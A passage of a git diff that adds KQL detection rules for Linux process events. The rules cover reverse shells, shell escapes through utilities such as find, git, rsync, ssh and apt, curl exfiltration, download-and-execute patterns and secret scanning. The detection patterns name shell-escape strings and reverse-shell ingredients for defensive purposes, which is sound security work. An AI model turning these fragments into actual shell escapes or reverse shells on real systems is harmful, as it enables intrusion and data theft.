+| where (ProcessCommandLine contains " ash" or ProcessCommandLine contains " bash" or ProcessCommandLine contains " bsh" or ProcessCommandLine contains " csh" or ProcessCommandLine contains " ksh" or ProcessCommandLine contains " pdksh" or ProcessCommandLine contains " sh" or ProcessCommandLine contains " tcsh") and (ProcessCommandLine contains " -e" and ProcessCommandLine contains "rsocket" and ProcessCommandLine contains "TCPSocket") and FolderPath contains "ruby"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/potential_suspicious_change_to_sensitive_critical_files.kql b/KQL/rules/linux/process_creation/potential_suspicious_change_to_sensitive_critical_files.kql
new file mode 100644
index 00000000..8a42af26
--- /dev/null
+++ b/KQL/rules/linux/process_creation/potential_suspicious_change_to_sensitive_critical_files.kql
@@ -0,0 +1,12 @@
+// Title: Potential Suspicious Change To Sensitive/Critical Files
+// Author: @d4ns4n_ (Wuerth-Phoenix)
+// Date: 2023-05-30
+// Level: medium
+// Description: Detects changes of sensitive and critical files. Monitors files that you don't expect to change without planning on Linux system.
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1565.001
+// False Positives:
+//   - Some false positives are to be expected on user or administrator machines. Apply additional filters as needed.
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains ">" and (FolderPath endswith "/cat" or FolderPath endswith "/echo" or FolderPath endswith "/grep" or FolderPath endswith "/head" or FolderPath endswith "/more" or FolderPath endswith "/tail")) or (FolderPath endswith "/emacs" or FolderPath endswith "/nano" or FolderPath endswith "/sed" or FolderPath endswith "/vi" or FolderPath endswith "/vim")) and (ProcessCommandLine contains "/bin/login" or ProcessCommandLine contains "/bin/passwd" or ProcessCommandLine contains "/boot/" or (ProcessCommandLine contains "/etc/" and ProcessCommandLine contains ".conf") or ProcessCommandLine contains "/etc/cron." or ProcessCommandLine contains "/etc/crontab" or ProcessCommandLine contains "/etc/hosts" or ProcessCommandLine contains "/etc/init.d" or ProcessCommandLine contains "/etc/sudoers" or ProcessCommandLine contains "/opt/bin/" or ProcessCommandLine contains "/sbin" or ProcessCommandLine contains "/usr/bin/" or ProcessCommandLine contains "/usr/local/bin/")
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/potential_xterm_reverse_shell.kql b/KQL/rules/linux/process_creation/potential_xterm_reverse_shell.kql
new file mode 100644
index 00000000..2fd1ef34
--- /dev/null
+++ b/KQL/rules/linux/process_creation/potential_xterm_reverse_shell.kql
@@ -0,0 +1,10 @@
+// Title: Potential Xterm Reverse Shell
+// Author: @d4ns4n_
+// Date: 2023-04-24
+// Level: medium
+// Description: Detects usage of "xterm" as a potential reverse shell tunnel
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "-display" and ProcessCommandLine endswith ":1" and FolderPath contains "xterm"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/potentially_suspicious_execution_from_tmp_folder.kql b/KQL/rules/linux/process_creation/potentially_suspicious_execution_from_tmp_folder.kql
new file mode 100644
index 00000000..eac2a502
--- /dev/null
+++ b/KQL/rules/linux/process_creation/potentially_suspicious_execution_from_tmp_folder.kql
@@ -0,0 +1,10 @@
+// Title: Potentially Suspicious Execution From Tmp Folder
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2023-06-02
+// Level: medium
+// Description: Detects a potentially suspicious execution of a process located in the '/tmp/' folder
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036
+
+DeviceProcessEvents
+| where FolderPath startswith "/tmp/" and (not(FolderPath endswith "/usr/bin/nextcloud"))
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/potentially_suspicious_named_pipe_created_via_mkfifo.kql b/KQL/rules/linux/process_creation/potentially_suspicious_named_pipe_created_via_mkfifo.kql
new file mode 100644
index 00000000..d4000a62
--- /dev/null
+++ b/KQL/rules/linux/process_creation/potentially_suspicious_named_pipe_created_via_mkfifo.kql
@@ -0,0 +1,10 @@
+// Title: Potentially Suspicious Named Pipe Created Via Mkfifo
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-16
+// Level: medium
+// Description: Detects the creation of a new named pipe using the "mkfifo" utility in a potentially suspicious location
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " /tmp/" and FolderPath endswith "/mkfifo"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/print_history_file_contents.kql b/KQL/rules/linux/process_creation/print_history_file_contents.kql
new file mode 100644
index 00000000..7e7fdd46
--- /dev/null
+++ b/KQL/rules/linux/process_creation/print_history_file_contents.kql
@@ -0,0 +1,12 @@
+// Title: Print History File Contents
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-06-20
+// Level: medium
+// Description: Detects events in which someone prints the contents of history files to the commandline or redirects it to a file for reconnaissance
+// MITRE Tactic: Reconnaissance
+// Tags: attack.reconnaissance, attack.t1592.004
+// False Positives:
+//   - Legitimate administration activities
+
+DeviceProcessEvents
+| where (FolderPath endswith "/cat" or FolderPath endswith "/head" or FolderPath endswith "/tail" or FolderPath endswith "/more") and ((ProcessCommandLine contains "/.bash_history" or ProcessCommandLine contains "/.zsh_history") or (ProcessCommandLine endswith "_history" or ProcessCommandLine endswith ".history" or ProcessCommandLine endswith "zhistory"))
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/pua_trufflehog_execution_linux.kql b/KQL/rules/linux/process_creation/pua_trufflehog_execution_linux.kql
new file mode 100644
index 00000000..719410cb
--- /dev/null
+++ b/KQL/rules/linux/process_creation/pua_trufflehog_execution_linux.kql
@@ -0,0 +1,14 @@
+// Title: PUA - TruffleHog Execution - Linux
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-09-24
+// Level: medium
+// Description: Detects execution of TruffleHog, a tool used to search for secrets in different platforms like Git, Jira, Slack, SharePoint, etc. that could be used maliciously.
+// While it is a legitimate tool, intended for use in CI pipelines and security assessments,
+// It was observed in the Shai-Hulud malware campaign targeting npm packages to steal sensitive information.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.credential-access, attack.t1083, attack.t1552.001
+// False Positives:
+//   - Legitimate use of TruffleHog by security teams or developers.
+
+DeviceProcessEvents
+| where FolderPath endswith "/trufflehog" or ((ProcessCommandLine contains " docker --image " or ProcessCommandLine contains " Git " or ProcessCommandLine contains " GitHub " or ProcessCommandLine contains " Jira " or ProcessCommandLine contains " Slack " or ProcessCommandLine contains " Confluence " or ProcessCommandLine contains " SharePoint " or ProcessCommandLine contains " s3 " or ProcessCommandLine contains " gcs ") and ProcessCommandLine contains " --results=verified")
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/python_reverse_shell_execution_via_pty_and_socket_modules.kql b/KQL/rules/linux/process_creation/python_reverse_shell_execution_via_pty_and_socket_modules.kql
new file mode 100644
index 00000000..60bfc298
--- /dev/null
+++ b/KQL/rules/linux/process_creation/python_reverse_shell_execution_via_pty_and_socket_modules.kql
@@ -0,0 +1,10 @@
+// Title: Python Reverse Shell Execution Via PTY And Socket Modules
+// Author: @d4ns4n_, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-04-24
+// Level: high
+// Description: Detects the execution of python with calls to the socket and pty module in order to connect and spawn a potential reverse shell.
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -c " and ProcessCommandLine contains "import" and ProcessCommandLine contains "pty" and ProcessCommandLine contains "socket" and ProcessCommandLine contains "spawn" and ProcessCommandLine contains ".connect") and FolderPath contains "python"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/python_spawning_pretty_tty_via_pty_module.kql b/KQL/rules/linux/process_creation/python_spawning_pretty_tty_via_pty_module.kql
new file mode 100644
index 00000000..5e2e796d
--- /dev/null
+++ b/KQL/rules/linux/process_creation/python_spawning_pretty_tty_via_pty_module.kql
@@ -0,0 +1,10 @@
+// Title: Python Spawning Pretty TTY Via PTY Module
+// Author: Nextron Systems
+// Date: 2022-06-03
+// Level: medium
+// Description: Detects a python process calling to the PTY module in order to spawn a pretty tty which could be indicative of potential reverse shell activity.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "import pty" or ProcessCommandLine contains "from pty ") and ProcessCommandLine contains "spawn" and ((FolderPath endswith "/python" or FolderPath endswith "/python2" or FolderPath endswith "/python3") or (FolderPath contains "/python2." or FolderPath contains "/python3."))
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/python_webserver_execution_linux.kql b/KQL/rules/linux/process_creation/python_webserver_execution_linux.kql
new file mode 100644
index 00000000..175e8487
--- /dev/null
+++ b/KQL/rules/linux/process_creation/python_webserver_execution_linux.kql
@@ -0,0 +1,14 @@
+// Title: Python WebServer Execution - Linux
+// Author: Mohamed LAKRI
+// Date: 2025-10-17
+// Level: medium
+// Description: Detects the execution of Python web servers via command line interface (CLI).
+// After gaining access to target systems, adversaries may use Python's built-in HTTP server modules to quickly establish a web server without requiring additional software.
+// This technique is commonly used in post-exploitation scenarios as it provides a simple method for transferring files between the compromised host and attacker-controlled systems.
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.t1048.003
+// False Positives:
+//   - Testing or development activity
+
+DeviceProcessEvents
+| where ((FolderPath endswith "/python" or FolderPath endswith "/python2" or FolderPath endswith "/python3") or (FolderPath contains "/python2." or FolderPath contains "/python3.")) and (ProcessCommandLine contains "http.server" or ProcessCommandLine contains "SimpleHTTPServer")
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/remote_access_tool_team_viewer_session_started_on_linux_host.kql b/KQL/rules/linux/process_creation/remote_access_tool_team_viewer_session_started_on_linux_host.kql
new file mode 100644
index 00000000..23ff74bf
--- /dev/null
+++ b/KQL/rules/linux/process_creation/remote_access_tool_team_viewer_session_started_on_linux_host.kql
@@ -0,0 +1,13 @@
+// Title: Remote Access Tool - Team Viewer Session Started On Linux Host
+// Author: Josh Nickels, Qi Nan
+// Date: 2024-03-11
+// Level: low
+// Description: Detects the command line executed when TeamViewer starts a session started by a remote host.
+// Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.initial-access, attack.t1133
+// False Positives:
+//   - Legitimate usage of TeamViewer
+
+DeviceProcessEvents
+| where ProcessCommandLine endswith "/TeamViewer_Desktop --IPCport 5939 --Module 1" and FolderPath endswith "/TeamViewer_Desktop" and InitiatingProcessFolderPath endswith "/TeamViewer_Service"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/remove_immutable_file_attribute.kql b/KQL/rules/linux/process_creation/remove_immutable_file_attribute.kql
new file mode 100644
index 00000000..a7be8874
--- /dev/null
+++ b/KQL/rules/linux/process_creation/remove_immutable_file_attribute.kql
@@ -0,0 +1,12 @@
+// Title: Remove Immutable File Attribute
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-15
+// Level: medium
+// Description: Detects usage of the 'chattr' utility to remove immutable file attribute.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1222.002
+// False Positives:
+//   - Administrator interacting with immutable files (e.g. for instance backups).
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " -i " and FolderPath endswith "/chattr"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/remove_scheduled_cron_task_job.kql b/KQL/rules/linux/process_creation/remove_scheduled_cron_task_job.kql
new file mode 100644
index 00000000..a6ff966a
--- /dev/null
+++ b/KQL/rules/linux/process_creation/remove_scheduled_cron_task_job.kql
@@ -0,0 +1,11 @@
+// Title: Remove Scheduled Cron Task/Job
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-15
+// Level: medium
+// Description: Detects usage of the 'crontab' utility to remove the current crontab.
+// This is a common occurrence where cryptocurrency miners compete against each other by removing traces of other miners to hijack the maximum amount of resources possible
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " -r" and FolderPath endswith "crontab"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/scheduled_cron_task_job_linux.kql b/KQL/rules/linux/process_creation/scheduled_cron_task_job_linux.kql
new file mode 100644
index 00000000..bf4850ee
--- /dev/null
+++ b/KQL/rules/linux/process_creation/scheduled_cron_task_job_linux.kql
@@ -0,0 +1,12 @@
+// Title: Scheduled Cron Task/Job - Linux
+// Author: Alejandro Ortuno, oscd.community
+// Date: 2020-10-06
+// Level: medium
+// Description: Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.persistence, attack.privilege-escalation, attack.t1053.003
+// False Positives:
+//   - Legitimate administration activities
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "/tmp/" and FolderPath endswith "crontab"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/scheduled_task_job_at.kql b/KQL/rules/linux/process_creation/scheduled_task_job_at.kql
new file mode 100644
index 00000000..ee1cc60f
--- /dev/null
+++ b/KQL/rules/linux/process_creation/scheduled_task_job_at.kql
@@ -0,0 +1,13 @@
+// Title: Scheduled Task/Job At
+// Author: Ömer Günal, oscd.community
+// Date: 2020-10-06
+// Level: low
+// Description: Detects the use of at/atd which are utilities that are used to schedule tasks.
+// They are often abused by adversaries to maintain persistence or to perform task scheduling for initial or recurring execution of malicious code
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.002
+// False Positives:
+//   - Legitimate administration activities
+
+DeviceProcessEvents
+| where FolderPath endswith "/at" or FolderPath endswith "/atd"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/security_software_discovery_linux.kql b/KQL/rules/linux/process_creation/security_software_discovery_linux.kql
new file mode 100644
index 00000000..902ae8e1
--- /dev/null
+++ b/KQL/rules/linux/process_creation/security_software_discovery_linux.kql
@@ -0,0 +1,12 @@
+// Title: Security Software Discovery - Linux
+// Author: Daniil Yugoslavskiy, oscd.community
+// Date: 2020-10-19
+// Level: low
+// Description: Detects usage of system utilities (only grep and egrep for now) to discover security software discovery
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1518.001
+// False Positives:
+//   - Legitimate activities
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "nessusd" or ProcessCommandLine contains "td-agent" or ProcessCommandLine contains "packetbeat" or ProcessCommandLine contains "filebeat" or ProcessCommandLine contains "auditbeat" or ProcessCommandLine contains "osqueryd" or ProcessCommandLine contains "cbagentd" or ProcessCommandLine contains "falcond") and (FolderPath endswith "/grep" or FolderPath endswith "/egrep")
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/setuid_and_setgid.kql b/KQL/rules/linux/process_creation/setuid_and_setgid.kql
new file mode 100644
index 00000000..5cb14d38
--- /dev/null
+++ b/KQL/rules/linux/process_creation/setuid_and_setgid.kql
@@ -0,0 +1,12 @@
+// Title: Setuid and Setgid
+// Author: Ömer Günal
+// Date: 2020-06-16
+// Level: low
+// Description: Detects suspicious change of file privileges with chown and chmod commands
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1548.001
+// False Positives:
+//   - Legitimate administration activities
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " chmod u+s" or ProcessCommandLine contains " chmod g+s") and ProcessCommandLine contains "chown root"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/shell_execution_gcc_linux.kql b/KQL/rules/linux/process_creation/shell_execution_gcc_linux.kql
new file mode 100644
index 00000000..0c36903b
--- /dev/null
+++ b/KQL/rules/linux/process_creation/shell_execution_gcc_linux.kql
@@ -0,0 +1,10 @@
+// Title: Shell Execution GCC  - Linux
+// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)
+// Date: 2024-09-02
+// Level: high
+// Description: Detects the use of the "gcc" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1083
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/bin/bash,-s" or ProcessCommandLine contains "/bin/dash,-s" or ProcessCommandLine contains "/bin/fish,-s" or ProcessCommandLine contains "/bin/sh,-s" or ProcessCommandLine contains "/bin/zsh,-s") and (ProcessCommandLine contains "-wrapper" and (FolderPath endswith "/c89" or FolderPath endswith "/c99" or FolderPath endswith "/gcc"))
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/shell_execution_of_process_located_in_tmp_directory.kql b/KQL/rules/linux/process_creation/shell_execution_of_process_located_in_tmp_directory.kql
new file mode 100644
index 00000000..da13dec7
--- /dev/null
+++ b/KQL/rules/linux/process_creation/shell_execution_of_process_located_in_tmp_directory.kql
@@ -0,0 +1,10 @@
+// Title: Shell Execution Of Process Located In Tmp Directory
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2023-06-02
+// Level: high
+// Description: Detects execution of shells from a parent process located in a temporary (/tmp) directory
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where (FolderPath endswith "/bash" or FolderPath endswith "/csh" or FolderPath endswith "/dash" or FolderPath endswith "/fish" or FolderPath endswith "/ksh" or FolderPath endswith "/sh" or FolderPath endswith "/zsh") and InitiatingProcessFolderPath startswith "/tmp/"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/shell_execution_via_find_linux.kql b/KQL/rules/linux/process_creation/shell_execution_via_find_linux.kql
new file mode 100644
index 00000000..97c5fc00
--- /dev/null
+++ b/KQL/rules/linux/process_creation/shell_execution_via_find_linux.kql
@@ -0,0 +1,10 @@
+// Title: Shell Execution via Find - Linux
+// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)
+// Date: 2024-09-02
+// Level: high
+// Description: Detects the use of the find command to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or exploitation attempt.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1083
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/bin/bash" or ProcessCommandLine contains "/bin/dash" or ProcessCommandLine contains "/bin/fish" or ProcessCommandLine contains "/bin/sh" or ProcessCommandLine contains "/bin/zsh") and ((ProcessCommandLine contains " . " and ProcessCommandLine contains "-exec") and FolderPath endswith "/find")
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/shell_execution_via_flock_linux.kql b/KQL/rules/linux/process_creation/shell_execution_via_flock_linux.kql
new file mode 100644
index 00000000..5673720e
--- /dev/null
+++ b/KQL/rules/linux/process_creation/shell_execution_via_flock_linux.kql
@@ -0,0 +1,10 @@
+// Title: Shell Execution via Flock - Linux
+// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)
+// Date: 2024-09-02
+// Level: high
+// Description: Detects the use of the "flock" command to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1083
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/bin/bash" or ProcessCommandLine contains "/bin/dash" or ProcessCommandLine contains "/bin/fish" or ProcessCommandLine contains "/bin/sh" or ProcessCommandLine contains "/bin/zsh") and (ProcessCommandLine contains " -u " and FolderPath endswith "/flock")
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/shell_execution_via_git_linux.kql b/KQL/rules/linux/process_creation/shell_execution_via_git_linux.kql
new file mode 100644
index 00000000..2eadafa8
--- /dev/null
+++ b/KQL/rules/linux/process_creation/shell_execution_via_git_linux.kql
@@ -0,0 +1,10 @@
+// Title: Shell Execution via Git - Linux
+// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)
+// Date: 2024-09-02
+// Level: high
+// Description: Detects the use of the "git" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "bash 0<&1" or ProcessCommandLine contains "dash 0<&1" or ProcessCommandLine contains "sh 0<&1") and (InitiatingProcessCommandLine contains " -p " and InitiatingProcessCommandLine contains "help") and InitiatingProcessFolderPath endswith "/git"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/shell_execution_via_nice_linux.kql b/KQL/rules/linux/process_creation/shell_execution_via_nice_linux.kql
new file mode 100644
index 00000000..eefb729d
--- /dev/null
+++ b/KQL/rules/linux/process_creation/shell_execution_via_nice_linux.kql
@@ -0,0 +1,10 @@
+// Title: Shell Execution via Nice - Linux
+// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)
+// Date: 2024-09-02
+// Level: high
+// Description: Detects the use of the "nice" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1083
+
+DeviceProcessEvents
+| where (ProcessCommandLine endswith "/bin/bash" or ProcessCommandLine endswith "/bin/dash" or ProcessCommandLine endswith "/bin/fish" or ProcessCommandLine endswith "/bin/sh" or ProcessCommandLine endswith "/bin/zsh") and FolderPath endswith "/nice"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/shell_execution_via_rsync_linux.kql b/KQL/rules/linux/process_creation/shell_execution_via_rsync_linux.kql
new file mode 100644
index 00000000..fa87938e
--- /dev/null
+++ b/KQL/rules/linux/process_creation/shell_execution_via_rsync_linux.kql
@@ -0,0 +1,12 @@
+// Title: Shell Execution via Rsync - Linux
+// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.), Florian Roth
+// Date: 2024-09-02
+// Level: high
+// Description: Detects the use of the "rsync" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+// False Positives:
+//   - Legitimate cases in which "rsync" is used to execute a shell
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/ash " or ProcessCommandLine contains "/bash " or ProcessCommandLine contains "/dash " or ProcessCommandLine contains "/csh " or ProcessCommandLine contains "/sh " or ProcessCommandLine contains "/zsh " or ProcessCommandLine contains "/tcsh " or ProcessCommandLine contains "/ksh " or ProcessCommandLine contains "'ash " or ProcessCommandLine contains "'bash " or ProcessCommandLine contains "'dash " or ProcessCommandLine contains "'csh " or ProcessCommandLine contains "'sh " or ProcessCommandLine contains "'zsh " or ProcessCommandLine contains "'tcsh " or ProcessCommandLine contains "'ksh ") and (ProcessCommandLine contains " -e " and (FolderPath endswith "/rsync" or FolderPath endswith "/rsyncd"))
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/shell_invocation_via_apt_linux.kql b/KQL/rules/linux/process_creation/shell_invocation_via_apt_linux.kql
new file mode 100644
index 00000000..6f2fbba6
--- /dev/null
+++ b/KQL/rules/linux/process_creation/shell_invocation_via_apt_linux.kql
@@ -0,0 +1,11 @@
+// Title: Shell Invocation via Apt - Linux
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-12-28
+// Level: medium
+// Description: Detects the use of the "apt" and "apt-get" commands to execute a shell or proxy commands.
+// Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1083
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "APT::Update::Pre-Invoke::=" and (FolderPath endswith "/apt" or FolderPath endswith "/apt-get")
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/shell_invocation_via_env_command_linux.kql b/KQL/rules/linux/process_creation/shell_invocation_via_env_command_linux.kql
new file mode 100644
index 00000000..6c1e49de
--- /dev/null
+++ b/KQL/rules/linux/process_creation/shell_invocation_via_env_command_linux.kql
@@ -0,0 +1,12 @@
+// Title: Shell Invocation via Env Command - Linux
+// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)
+// Date: 2024-09-02
+// Level: high
+// Description: Detects the use of the env command to invoke a shell. This may indicate an attempt to bypass restricted environments, escalate privileges, or execute arbitrary commands.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+// False Positives:
+//   - Github operations such as ghe-backup
+
+DeviceProcessEvents
+| where (ProcessCommandLine endswith "/bin/bash" or ProcessCommandLine endswith "/bin/dash" or ProcessCommandLine endswith "/bin/fish" or ProcessCommandLine endswith "/bin/sh" or ProcessCommandLine endswith "/bin/zsh") and FolderPath endswith "/env"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/shell_invocation_via_ssh_linux.kql b/KQL/rules/linux/process_creation/shell_invocation_via_ssh_linux.kql
new file mode 100644
index 00000000..a89ce264
--- /dev/null
+++ b/KQL/rules/linux/process_creation/shell_invocation_via_ssh_linux.kql
@@ -0,0 +1,10 @@
+// Title: Shell Invocation Via Ssh - Linux
+// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)
+// Date: 2024-08-29
+// Level: high
+// Description: Detects the use of the "ssh" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/bin/bash" or ProcessCommandLine contains "/bin/dash" or ProcessCommandLine contains "/bin/fish" or ProcessCommandLine contains "/bin/sh" or ProcessCommandLine contains "/bin/zsh" or ProcessCommandLine contains "sh 0<&2 1>&2" or ProcessCommandLine contains "sh 1>&2 0<&2") and ((ProcessCommandLine contains "ProxyCommand=;" or ProcessCommandLine contains "permitlocalcommand=yes" or ProcessCommandLine contains "localhost") and FolderPath endswith "/ssh")
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/suspicious_curl_change_user_agents_linux.kql b/KQL/rules/linux/process_creation/suspicious_curl_change_user_agents_linux.kql
new file mode 100644
index 00000000..9cb0a989
--- /dev/null
+++ b/KQL/rules/linux/process_creation/suspicious_curl_change_user_agents_linux.kql
@@ -0,0 +1,13 @@
+// Title: Suspicious Curl Change User Agents - Linux
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-15
+// Level: medium
+// Description: Detects a suspicious curl process start on linux with set useragent options
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1071.001
+// False Positives:
+//   - Scripts created by developers and admins
+//   - Administrative activity
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -A " or ProcessCommandLine contains " --user-agent ") and FolderPath endswith "/curl"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/suspicious_curl_file_upload_linux.kql b/KQL/rules/linux/process_creation/suspicious_curl_file_upload_linux.kql
new file mode 100644
index 00000000..b704ae58
--- /dev/null
+++ b/KQL/rules/linux/process_creation/suspicious_curl_file_upload_linux.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Curl File Upload - Linux
+// Author: Nasreddine Bencherchali (Nextron Systems), Cedric MAURUGEON (Update)
+// Date: 2022-09-15
+// Level: medium
+// Description: Detects a suspicious curl process start the adds a file to a web request
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.command-and-control, attack.t1567, attack.t1105
+// False Positives:
+//   - Scripts created by developers and admins
+
+DeviceProcessEvents
+| where (((ProcessCommandLine contains " --form" or ProcessCommandLine contains " --upload-file " or ProcessCommandLine contains " --data " or ProcessCommandLine contains " --data-") or ProcessCommandLine matches regex "\\s-[FTd]\\s") and FolderPath endswith "/curl") and (not((ProcessCommandLine contains "://localhost" or ProcessCommandLine contains "://127.0.0.1")))
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/suspicious_download_and_execute_pattern_via_curl_wget.kql b/KQL/rules/linux/process_creation/suspicious_download_and_execute_pattern_via_curl_wget.kql
new file mode 100644
index 00000000..67d2a5c2
--- /dev/null
+++ b/KQL/rules/linux/process_creation/suspicious_download_and_execute_pattern_via_curl_wget.kql
@@ -0,0 +1,16 @@
+// Title: Suspicious Download and Execute Pattern via Curl/Wget
+// Author: Aayush Gupta
+// Date: 2025-06-17
+// Level: high
+// Description: Detects suspicious use of command-line tools such as curl or wget to download remote
+// content - particularly scripts - into temporary directories (e.g., /dev/shm, /tmp), followed by
+// immediate execution, indicating potential malicious activity. This pattern is commonly used
+// by malicious scripts, stagers, or downloaders in fileless or multi-stage Linux attacks.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.004, attack.t1203
+// False Positives:
+//   - System update scripts using temporary files
+//   - Installer scripts or automated provisioning tools
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/curl" or ProcessCommandLine contains "/wget") and ProcessCommandLine contains "sh -c" and (ProcessCommandLine contains "/tmp/" or ProcessCommandLine contains "/dev/shm/")
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/suspicious_git_clone_linux.kql b/KQL/rules/linux/process_creation/suspicious_git_clone_linux.kql
new file mode 100644
index 00000000..a8ab897a
--- /dev/null
+++ b/KQL/rules/linux/process_creation/suspicious_git_clone_linux.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Git Clone - Linux
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-03
+// Level: medium
+// Description: Detects execution of "git" in order to clone a remote repository that contain suspicious keywords which might be suspicious
